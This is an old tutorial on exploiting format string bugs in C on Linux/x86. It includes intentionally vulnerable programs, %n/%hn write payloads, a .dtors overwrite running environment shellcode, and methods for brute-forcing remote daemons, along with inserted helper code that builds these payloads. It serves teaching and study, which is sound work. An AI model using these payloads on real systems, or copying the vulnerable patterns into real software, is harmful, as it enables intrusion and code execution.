The Mystery of Format String Exploitation
Sep 12 2003, 05:50 (UTC+0)

Format strings, and how to exploit them!
rebel writes:
For the past month I've been looking a lot into format strings
and how to exploit them. While trying to gain knowledge on the
subject, I noticed that there are not a lot of easy to understand,
straightforward papers. While most hackers are skilled in the
art of hacking, not all of them are very pedagogic ;). I wrote
this text for people who want to learn what format strings are
and how to exploit insecure code. I tried to make it easy to
understand, although some things may seem tricky at first.
/*
 * .: THE MYSTERY OF FORMAT STRING EXPLOITATION :.
 * - written by rebel -
 * 31/07/03 - 19:25:05
 */
---------------
-> NOTES
---------------
All the examples in this text are on the Linux/x86 architecture
and it is assumed throughout the text that this is what we are
exploiting. Format strings can still be exploited on other
operating systems, but it works a little differently; in particular
the shellcode is not the same.
---------------
-> REQUIREMENTS
---------------
General C knowledge and basic knowledge about how the stack
works is very helpful. If you want to try the examples you'll
need linux, gcc, gdb and objdump. A brain might also come in
handy. So get yourself some milk & cookies and let's start.
---------------
-> WHAT ARE FORMAT STRINGS
---------------
A format string is simply a string of characters that contains
special format string identifiers. If you have programmed in C
you are familiar with functions such as printf(). printf() takes
a format string as its first argument, followed by the variables
which the format string will use. Here's an example:
#include <stdio.h>
int main(void)
{
    int x = 41705;
    printf("x = %d, x / 2 = %d.\n", x, x / 2);
}
This will output "x = 41705, x / 2 = 20852.". The first argument
is the format string itself; it contains ordinary characters
and format string identifiers. In this example the '%d' identifier
was used. '%d' takes an integer argument and prints it in decimal;
here the first '%d' was replaced by x, which held the integer
value 41705. There are many other format string identifiers.
Some of them are %x, which is like %d but outputs in hex, %s,
which takes a character pointer and prints the string until a
nullbyte is encountered, and %f, which takes a floating point
number.
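To see the identifiers listed above side by side, here is a small sketch. The helper name describe() is made up for this illustration and is not part of the original examples; it just formats one value with each of %d, %x, %s and %f into a buffer supplied by the caller.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* describe() is a hypothetical helper for illustration only.
 * It prints a string with %s, the same integer with %d and %x,
 * and a double with %f, and returns what snprintf() returns. */
int describe(char *out, size_t outlen, int value, const char *name,
             double ratio)
{
    assert(out != NULL && name != NULL);
    /* The format string is a constant. The data only ever shows up
     * as arguments, never as the format itself. */
    return snprintf(out, outlen, "%s: dec=%d hex=%x ratio=%f",
                    name, value, (unsigned int)value, ratio);
}
```

Calling describe(buf, sizeof buf, 41705, "x", 0.5) leaves "x: dec=41705 hex=a2e9 ratio=0.500000" in buf.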
---------------
-> FS ABUSE
---------------
Now, how can these be abused by an attacker? Try this program:
#include <stdio.h>
int main(int argc, char *argv[])
{
printf(argv[1]);
}
This program simply prints its first argument, example:
- [root@knark] ~/research/paper > ./ex2 "Hello world."
Hello world.
- [root@knark] ~/research/paper >
Now, how is this program susceptible to attacks which allow an
attacker to execute arbitrary code, you ask?
It's simple: printf(argv[1]) should be written as printf("%s",argv[1]).
If the "%s" is forgotten or simply ignored, printf() will look
for format string identifiers in the buffer itself, in this case
argv[1].
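For contrast, a minimal sketch of the safe pattern. echo_safe() is a hypothetical name, and it writes into a buffer instead of stdout only so the result is easy to inspect; the point is that the user's text is an argument to a constant "%s" format.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* echo_safe() is a hypothetical helper, not part of the original ex2.
 * User input is passed as an argument to a constant "%s" format, so
 * any '%' characters inside it are copied verbatim instead of being
 * interpreted as format string identifiers. */
int echo_safe(char *out, size_t outlen, const char *user_input)
{
    assert(out != NULL && user_input != NULL);
    return snprintf(out, outlen, "%s", user_input);
}
```

Fed the string "AAAA %x %x", this copies the text through unchanged, '%x' and all.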
Let's try something..
- [root@knark] ~/research/paper > ./ex2 "AAAA %x %x"
AAAA 401438c8 bffffc58
- [root@knark] ~/research/paper >
Uh-oh, now you can probably see what's going on. printf() recognized
%x as a format string identifier and simply did what %x is supposed
to do: print its next argument in hex. Since we passed no such
argument, it printed the next 4 bytes on the stack instead. We
can also print whatever we want, from wherever we want. Try this:
#include <stdio.h>
int main(void)
{
    char secret[] = "hack.se is lame";
    char buffer[512];
    char target[512];
    printf("secret = %p\n", (void *)secret);
    fgets(buffer, 512, stdin);
    snprintf(target, 512, buffer); /* vulnerable: buffer is the format */
    printf("%s", target);
}
- [root@knark] ~/research/paper > ./ex3
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x
AAAA4013fe20 0 0 0 41414141 33313034 30326566
- [root@knark] ~/research/paper >
As you can see, format string vulnerabilities apply to all format
string functions; in this example snprintf() has been misused.
What we do is, we first give it 'AAAA', and then proceed to find
out how far from $esp our buffer lies. As we can see, the 5th
'%x' prints 41414141. This is the hex representation of AAAA,
so we now know that our buffer lies 5 'pops' of 4 bytes each
(5 * 4 = 20 bytes) from $esp. So, how do we get it to print the
contents of char secret[]?
Now that we know that our buffer lies 5 'pops' from $esp, we
can supply an address for %s. %s takes an address as argument
and prints whatever lies there until a nullbyte is found. We
have to supply bffffc68 to %s, and since x86 is little endian
we have to reverse the byte order (least significant byte first).
- [root@knark] ~/research/paper > printf "\x68\xfc\xff\xbf%%5\$s" | ./ex3
secret = 0xbffffc68
hüÿ¿hack.se is lame
- [root@knark] ~/research/paper >
Tadah! %s printed out the contents of 0xbffffc68, which was char
secret[].
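The byte reversal used in the command above can be written out as a tiny sketch. pack_le32() is a made-up helper name; it assumes a 32-bit target address, as on the linux/x86 setup used throughout this text.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* pack_le32() is a hypothetical helper: it stores a 32-bit address
 * least significant byte first, which is the order an x86 CPU keeps
 * it in memory. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    assert(out != NULL);
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For 0xbffffc68 this yields the bytes 68 fc ff bf, matching the "\x68\xfc\xff\xbf" typed by hand.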
Ok, so now you know it's possible to print anything from anywhere
using format strings, but how is that supposed to give you a
shell?
---------------
-> WRITING
---------------
There's one format string identifier which I haven't introduced
yet, and it's what makes 'em great: %n. %n takes a pointer to
an int and writes the number of bytes printed so far to it. Try
this:
#include <stdio.h>
int main(void)
{
    int x = 0;
    printf("ABCDEFG\n%n", &x);
    printf("Written bytes: %d\n", x);
}
- [root@knark] ~/research/paper > ./ex4
ABCDEFG
Written bytes: 8
- [root@knark] ~/research/paper >
Well well.. since "ABCDEFG\n" is 8 bytes, the value 8 gets written
to the address of x. I'm sure you are beginning to see the possibilities
with this.. just as we can view anything from anywhere with %s,
we can write anything to anywhere with %n. So, let's try this
out, shall we?
#include <stdio.h>
int main(void)
{
    int x = 5;
    char buffer[52];
    printf("&x = %p\n", (void *)&x);
    fgets(buffer, 52, stdin);
    printf(buffer); /* vulnerable: buffer is the format */
    printf("x = %d\n", x);
}
- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
test
test
x = 5
- [root@knark] ~/research/paper >
We now know that x lies at 0xbffffc74, but just like %s, %n takes
an address as argument, which we must supply. Off we go to find
the stackpop:
- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
AAAA%x %x %x %x %x %x %x %x %x
AAAA34 4013fe20 401217f4 8049574 8049678 0 0 41414141 25207825
x = 5
- [root@knark] ~/research/paper >
Ok, as we can see, 8 is the offset: the 8th %x printed 41414141.
As before, we write the format string like this:
[4 byte address]%[offset]$n
The number before the '$' selects which argument the identifier
uses. Example:
#include <stdio.h>
int main(void)
{
    printf("%3$d %2$d %1$d.\n", 1, 2, 3);
}
- [root@knark] ~/research/paper > ./dollah
3 2 1.
Now, back to the %n thing. &x lies at bffffc74, let's write
to it.
- [root@knark] ~/research/paper > printf "\x74\xfc\xff\xbf%%8\$n" | ./ex5
&x = 0xbffffc74
tüÿ¿x = 4
- [root@knark] ~/research/paper >
Just like it should, x gets 4 assigned to it. If we analyze
our format string, we can see that the only thing printed before
%n is the 4 byte address of x, so the number of bytes printed
is 4. This value is then written to bffffc74.
---------------
-> MKAY, ME WANT SHELL
---------------
So, how can we abuse this to execute arbitrary code? In buffer
overflows we overwrite the saved return address with the address
of our shellcode, thereby executing anything we want. With format
strings it's a little different. You can overwrite the saved
return address, but it's too much of a hassle when exploiting
something locally. As I will explain later, it is however a
very good option when doing remote format string attacks. The
simplest way of local exploitation is to overwrite the .dtors
section of the ELF binary with the address of our shellcode.
The .dtors section holds memory addresses which point to machine
code that is to be executed when the program ends. By default
it holds nothing, but we're gonna change that.
- [root@knark] ~/research/paper > objdump -h ex5 | grep dtors
18 .dtors 00000008 08049648 08049648 00000648 2**2
- [root@knark] ~/research/paper >
From objdump we can easily find out that DTOR_LIST is at 0x08049648.
DTOR_END, which is where we want to store our shellcode address,
is always at DTOR_LIST+4, in this case 0x804964c. Obviously,
the location of the .dtors section varies from binary to binary.
Ok, now we know the address to write to, so where do we put the
shellcode? The easiest way is to put it in the environment.
Let's make an app that puts an egg in the env:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x13\x59\x29\xc0\xb0\x04"
    "\x29\xdb\x43\x29\xd2\xb2\x0a"
    "\xcd\x80\x29\xc0\x40\xcd\x80"
    "\xe8\xe8\xff\xff\xff"
    "HelloKitty";
int main(int argc, char *argv[])
{
    setenv("EGG", shellcode, 1);
    system("bash");
}
This puts an "egg" in the environment which holds some shellcode
that prints "HelloKitty".
Let's move on to finding where it's located:
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
    printf("Egg address: %p\n", (void *)getenv("EGG"));
}
- [root@knark] ~/research/paper > ./egg
- [root@knark] ~/research/paper > ./getegg
Egg address: 0xbffffdc0
- [root@knark] ~/research/paper >
Okie dokie, we now have all the information we need to craft
our very own format string. Harhar! There are 2 main techniques
for making a format string: one is write-1-byte-at-a-time and
the other is.. you guessed it, write-2-bytes-at-a-time. How do
they differ? Well, not much really. They both do the same thing,
but the 2-bytes-at-a-time one can be a bit tougher on the CPU
& memory because it prints far more padding. Personally it is
the one I prefer. Let's make one!
destination: 804964c
content: bffffdc0
Since x86 is little endian, we write the low half first. First
we want to write 0xfdc0 (2 bytes) to 804964c, then 0xbfff (2 bytes)
to 804964c+2 (804964e).
Since we are using %n to write it all, we would have to print
_a lot_ of characters to make the internal byte counter of %n
increase that far. Putting them in the format string itself is
not possible, since not many buffers allow storing ~65000 bytes
:). We need to trick %n, therefore we use %.u with a precision,
like %.500u. This pads the printed number with zeros and increases
the internal byte counter without taking any real space in the
buffer. For example, printf("%.500u%n\n",1,&x) would make x
contain the value 500.
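Here is a small sketch of that padding trick under harmless conditions. counted_after_padding() is a hypothetical helper; it uses "%.*u", which takes the precision from an argument, so it should behave like "%.500u" when called with 500. Note that some C libraries refuse %n altogether, so treat this as something to try on a setup like the one in this text.

```c
#include <assert.h>
#include <stdio.h>

/* counted_after_padding() is a hypothetical helper. It prints one
 * unsigned value with a precision of `width` digits into a scratch
 * buffer and uses %n to read back how many bytes were counted. */
int counted_after_padding(int width)
{
    char scratch[1024];
    int counted = -1;

    assert(width >= 1 && width < (int)sizeof scratch);
    /* The value 0 is zero-padded to `width` digits. The format stays
     * a string literal; only the precision comes from an argument. */
    snprintf(scratch, sizeof scratch, "%.*u%n", width, 0u, &counted);
    return counted;
}
```

A handful of characters in the format ("%.500u") make the counter jump by 500, which is the whole point of the trick.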
First we put the addresses we want to write to into the format
string:
- [root@knark] ~/research/paper > printf "\x4c\x96\x04\x08\x4e\x96\x04\x08" > file
0xfdc0 = 64960
This is the first value we want to store. Since we have already
written 8 bytes (the two destination addresses), we only need
to pad with 64960 - 8 = 64952.
We use %hn, not %n, since %hn writes a short, which is what
we're writing (short = 2 bytes).
- [root@knark] ~/research/paper > echo -n "%.64952u%8\$hn" >> file
Remember that 8 is the offset to reach our buffer in the format
string.
Now we have written 64960 bytes and want to write 0xbfff (49151).
Here we run into a problem: 49151 is less than 64960, which is
what we have already written. We must do a 'rollover'. Instead
of writing 0xbfff we write 0x1bfff (114687); %hn only stores the
low 2 bytes, so the "1" gets discarded and 0xbfff is all that
gets written.
already written = 64960
to write = 114687 - 64960 = 49727
- [root@knark] ~/research/paper > echo -n "%.49727u%9\$hn" >> file
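The two padding calculations above, including the rollover, can be sketched in a few lines. hn_padding() and build_hn_pair() are hypothetical helper names, and the sketch assumes exactly what the walkthrough does: two 4 byte addresses (8 bytes) are printed first, and the second write uses the next argument number.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* hn_padding() and build_hn_pair() are hypothetical helper names. */

/* Padding needed so the low 16 bits of the byte counter become
 * `want` when `written` bytes have been printed so far. The final
 * & 0xffff performs the 'rollover' if the counter is past `want`. */
unsigned int hn_padding(uint16_t want, unsigned int written)
{
    return ((unsigned int)want - (written & 0xffffu)) & 0xffffu;
}

/* Build "%.<pad1>u%<offset>$hn%.<pad2>u%<offset+1>$hn". Assumes the
 * two 4-byte destination addresses (8 bytes) were printed first. */
int build_hn_pair(char *out, size_t outlen, uint16_t low_half,
                  uint16_t high_half, unsigned int offset)
{
    unsigned int pad1 = hn_padding(low_half, 8u);
    unsigned int pad2 = hn_padding(high_half, 8u + pad1);

    assert(out != NULL && offset >= 1);
    return snprintf(out, outlen, "%%.%uu%%%u$hn%%.%uu%%%u$hn",
                    pad1, offset, pad2, offset + 1);
}
```

With low_half = 0xfdc0, high_half = 0xbfff and offset = 8 this reproduces the paddings 64952 and 49727 worked out by hand. A padding smaller than the number of digits %u prints anyway (up to 10) does not shorten the output, so the sketch is only dependable when both paddings are at least 10.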
- [root@knark] ~/research/paper > cat file | ./ex5
&x = 0xbffffc44
000000000000000000....ALOT OF 0's.....
000000001075052064x = 5
HelloKitty
- [root@knark] ~/research/paper >
Tadah! The shellcode got executed, printing out "HelloKitty".
As you can see, making a fully automatic local exploit is very
easy using objdump and putting the shellcode in the env. Bruteforcing
the offset for %n is also easy. You give the target "AAAA%[n]$x",
with n starting at 1 and counting up. If the result contains
"AAAA41414141" you know you've hit the jackpot.
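The offset search just described boils down to two small steps, sketched here. make_probe() and probe_hit() are hypothetical names; how the probe is delivered to the target and how the response is read back is left out on purpose.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* make_probe() and probe_hit() are hypothetical helpers. */

/* Build the probe "AAAA%<n>$x" for argument number n. */
int make_probe(char *out, size_t outlen, unsigned int n)
{
    assert(out != NULL && n >= 1);
    return snprintf(out, outlen, "AAAA%%%u$x", n);
}

/* A response containing "AAAA41414141" means argument n was our own
 * buffer: %x printed the four 'A' bytes (0x41) back as hex. */
int probe_hit(const char *response)
{
    assert(response != NULL);
    return strstr(response, "AAAA41414141") != NULL;
}
```

A loop would call make_probe() with n = 1, 2, 3, ... and stop at the first n for which probe_hit() returns nonzero.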
---------------
-> REMOTE EXPLOITATION
---------------
I will not go through a full exploit example, but I will explain
my preferred method of remote format string exploitation. Everything
suddenly becomes a lot more complicated when it is a daemon we
are exploiting. We cannot find the .dtors with objdump, since
the binary is on a remote computer. Well, actually, we can overwrite
the .dtors, but only if it is the exact same binary as one we
have installed. For example, an ftpd on Redhat 9.0 would have
the same .dtors address on another computer with a totally different
setup, as long as it's running Redhat 9.0. What can differ is
the offset for %n, but it is very easy to bruteforce. Now, what
if we don't want to use crappy hardcoded targets for our exploit?
What if we want to do it completely automatically, i.e. bruteforce?
What we need is:
* 'stackpop' offset for %n
* buffer address
* saved return address
The method of finding the buffer address itself isn't that complicated.
We simply send:
[4 byte address]%%A%%|%[n]$s
where address is bruteforced in a loop, starting from 0xbfffffff
and working its way down, and n is the stackpop. If we receive
"%%A%%" somewhere in the output, we know we've hit our buffer's
address. Here's an example:
#include <stdio.h>
#include <strings.h>
int main(void)
{
    char buffer[512];
    bzero(buffer, 512);
    printf("buffer = %p.\n", (void *)buffer);
    fgets(buffer, 512, stdin);
    printf(buffer); /* vulnerable: buffer is the format */
}
- [root@knark] ~/research/paper > ./ex6
buffer = 0xbffffa48.
AAAA%x %x %x %x %x %x %x %x
AAAA200 4013fe20 400124c0 40007986 40000ad8 41414141 25207825 78252078
Stackpop is 6, address of buffer is 0xbffffa48.
- [root@knark] ~/research/paper > printf "\x48\xfa\xff\xbf%%%%A%%%%|%%6\$s" | ./ex6
buffer = 0xbffffa48.
Húÿ¿%A%|Húÿ¿%%A%%|%6$s
- [root@knark] ~/research/paper >
As we can see, %s dumps what's in our buffer. We use "%%A%%"
because if we receive "%%A%%" we know it has not been processed
by any format string function. If it had been, we would receive
"%A%", since "%%" is an escape sequence for '%' itself. When
we have found our buffer address, we can easily calculate the
saved return address. In this case the stack holds, from high
to low addresses, the saved return address of main(), which we
want to overwrite, then the saved ebp, and then buffer, which
is 512 bytes.
Where the saved ret is depends on the vulnerable function:
sprintf(target,buffer); would make ret lie at &target + sizeof(target)
+ sizeof(buffer) + 4. With printf(buffer) it lies at bufaddr
+ 512 + 4. Therefore, in this case ret lies at 0xbffffa48 + 512
+ 4 = 0xbffffc4c.
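As a sketch of that arithmetic: saved_ret_guess() is a hypothetical helper and it bakes in the layout assumed above (the buffer is the only local, the 4 byte saved ebp sits right after it, and the saved return address right after that). A compiler is free to add padding or reorder locals, so the result is a first guess and nothing more.

```c
#include <assert.h>
#include <stdint.h>

/* saved_ret_guess() is a hypothetical helper. Assumed layout, from
 * low to high addresses: buffer, saved ebp (4 bytes), saved return
 * address. Real binaries may differ. */
uint32_t saved_ret_guess(uint32_t buf_addr, uint32_t buf_size)
{
    assert(buf_size > 0);
    return buf_addr + buf_size + 4u;
}
```

For the ex6 run above, saved_ret_guess(0xbffffa48, 512) gives 0xbffffc4c.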
0x4141 = 16705, and 16705 - 8 (remember, two 4 byte addresses
for %hn) = 16697
- [root@knark] ~/research/paper > printf "\x4c\xfc\xff\xbf\x4e\xfc\xff\xbf%%.16697u%%6\$hn%%7\$hn" > file
- [root@knark] ~/research/paper > cat file | ./ex6
buffer = 0xbffffa48.
Lüÿ¿Nüÿ¿00000000000...lotsa zeros..i mean lots..really lots..
0000000000Segmentation fault (core dumped)
- [root@knark] ~/research/paper > gdb ./ex6 core
GNU gdb 5.3-debian
Copyright 2002 Free Software Foundation, Inc.
Core was generated by `./ex6'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Cha-ching! We overwrote the saved return address with 0x41414141!
As you can see, remote format string exploitation can be a bit
tricky, although not impossible.
I came up with a nice method for speeding up the bufaddr bruteforcing
(significantly) while tinkering with an exploit. The technique
goes like this: by utilizing ASCII codes, we can make a sort
of 'pillow' for us to land in, just like with NOPs in buffer
overflows, although it's not as straightforward. We first send
the 4 byte address for %s, just like normal. Then we send as
many ASCII characters as we can fit into the target buffer; the
optimal amount is about 90. We simply start at one character,
a good one being ASCII 38 (char '&'). After that we move up the
ASCII ladder by sending ASCII 39 (char ''') and so on. Each character
indicates where in the buffer we have hit. So, if we start at
ASCII 38, the offset of the hit from the start of the buffer
is always:
[ascii of current location (for example, ASCII 42, char '*')]
- 38 (since we start at 38, '&') + 4 (the address is 4 bytes)
and bufaddr is the address we tried minus that offset.
After we stuff in our ASCII chars, we put "%%A%%|%[n]$s", where
n is the stackpop. With this, we can determine if we've hit the
buffer at all by doing a strstr(result,"%%A%%|");
If it does exist, we know we've hit the buffer, and can do a
simple calculation of the start by analyzing the first character
that came back. Using this method we can use jumps of [frame]/2,
where frame is how many ASCII characters you've stuffed in the
buffer.
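A rough sketch of the ladder and of the address calculation it allows. fill_ladder(), buffer_start() and LADDER_START are names invented for this illustration, and the sketch follows my reading of the description above: the ladder sits right after the 4 byte address at the start of the buffer, and the first ladder character that %s echoes back tells us which rung the tried address landed on.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define LADDER_START 38 /* '&', the first rung suggested in the text */

/* fill_ladder() is a hypothetical helper: it writes `count`
 * consecutive ASCII codes starting at '&'. Starting at 38 also keeps
 * '%' (ASCII 37) out of the ladder. */
void fill_ladder(char *out, size_t count)
{
    size_t i;

    assert(out != NULL && LADDER_START + count <= 127);
    for (i = 0; i < count; i++)
        out[i] = (char)(LADDER_START + i);
}

/* buffer_start() is a hypothetical helper: given the address we
 * tried with %s and the first ladder character that came back,
 * subtract the rung index and the 4 address bytes before the
 * ladder to get the start of the buffer. */
uint32_t buffer_start(uint32_t tried_addr, char first_char)
{
    assert(first_char >= LADDER_START);
    return tried_addr - (uint32_t)(first_char - LADDER_START) - 4u;
}
```

If the tried address lands on the '*' rung (ASCII 42), the hit is 42 - 38 + 4 = 8 bytes into the buffer, so the buffer starts 8 bytes below the tried address.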
---------------
-> BUHBYE
---------------
That's all from me. I hope you enjoyed the text and learned
something. If you have any suggestions/comments you can contact
me at rebel@bonbon.net. You can also catch me on IRC, rebel^@EFnet
and rebel@freenode.
Cheerio, ta-ta and good luck!
greets: dvdman, dcryptr, RAk, freestyler, nebunu, ntrude, m0lted (ascii dood), xmb, norse, zarwt, q\, suspect